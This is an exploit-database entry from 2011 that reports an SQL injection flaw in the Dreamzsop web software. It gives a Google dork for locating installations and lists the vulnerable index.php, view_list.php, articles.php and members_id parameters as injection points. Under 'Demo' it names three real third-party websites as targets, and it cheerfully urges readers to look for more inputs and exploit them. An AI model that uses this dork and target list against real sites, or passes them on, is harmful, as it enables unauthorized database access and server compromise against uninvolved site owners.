SQL Injection Vulnerbility in Dreamzsop



EKU-ID: 367 CVE: OSVDB-ID:
Author: lionaneesh Published: 2011-05-31 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: SQL Injection Vulnerbility in Dreamzsop
# Google Dork: intext:"By: Dreamzsop"
# Date: 30/5/2011
# Author: lionaneesh
# Software Link: http://dreamzsop.co.in/
# Risk Level : High
# A hacker can get admin access to web database leading to further
attacks , Shelling and Rooting of server

POC :-

http://[sitename]/[path]/index.php?id=%inject_here%

http://[sitename]/[path]/members_id=%inject_here%

http://[sitename]/[path]/view_list.php?id=%Inject_Here%

http://[sitename]/[path]/articles.php?art_catid=%Inject_Here%


Just play with your imagination , search for more data inputs and
exploit! :D ;D :))


Demo :-

http://www.findfriendz.com/videos/online/index.php?id=%Inject_HERE%790
http://www.cbseguess.com/profiles/?members_id=%Inject_here%17967
http://www.smehelpline.com/listings/view_list.php?id=%Inject_here%3446


--------------------------------------------------------------------------------